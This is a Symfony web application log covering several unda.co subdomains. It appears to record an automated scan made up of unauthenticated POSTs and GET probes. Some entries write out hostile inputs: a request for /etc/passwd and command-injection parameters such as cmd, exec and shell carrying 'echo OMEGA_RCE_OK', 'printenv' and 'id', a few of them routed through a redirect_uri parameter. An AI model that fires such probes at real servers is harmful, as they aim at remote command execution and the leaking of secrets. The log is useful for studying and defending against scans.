[2025-12-17 04:44:26] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:26] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:26] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:26] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:26] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:26] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-17 04:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:26] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 04:44:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 04:44:27] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:27] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 04:44:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:27] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Decho%2520OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=printenv","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dprintenv","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:29] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=id","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 04:44:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 04:44:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 04:44:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 04:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 04:44:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Did","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
